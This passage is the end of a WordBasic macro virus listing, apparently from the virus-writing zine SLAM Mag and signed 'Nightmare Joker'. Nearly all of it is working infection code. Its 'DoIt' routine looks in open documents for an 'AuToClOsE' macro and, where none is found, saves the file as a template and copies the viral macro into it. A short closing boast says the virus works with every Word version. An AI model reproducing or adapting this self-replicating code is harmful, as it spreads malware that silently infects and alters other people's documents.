InsertPara
Insert "cULT.DoIt"
DocClose 1 'Close and save it.
End Sub 'end.
Sub DoIt 'Routine to infect
On Error Goto Finish 'any active file.
If CountMacros(1) > 0 Then 'Count all macros
For o = 1 To CountMacros(1) 'in the active file.
If MacroName$(o, 1) = "AuToClOsE" Then 'If there the
Infect = 1 'AuToClOsE macro then
End If 'Infect = 1.
Next o 'search again.
End If
If Infect = 0 Then 'If it's not infected
FileSaveAs .Format = 1 'then save it as a
MacroCopy "Global:cULT", WindowName$() + ":AuToClOsE" 'template, copy the
FileSaveAll 1, 1 'macro and again save
End If 'all.
End Sub 'end.
---- End of macro virus -----------------------------------------------------
Yeah, ChAkA works now with every version of word.
Of course, we could now use more menu macros, but I think it's better to save time at the infection. And you know, WordBasic is really laammee. :(
More different versions in the next SLAM Mag.
- Nightmare Joker -
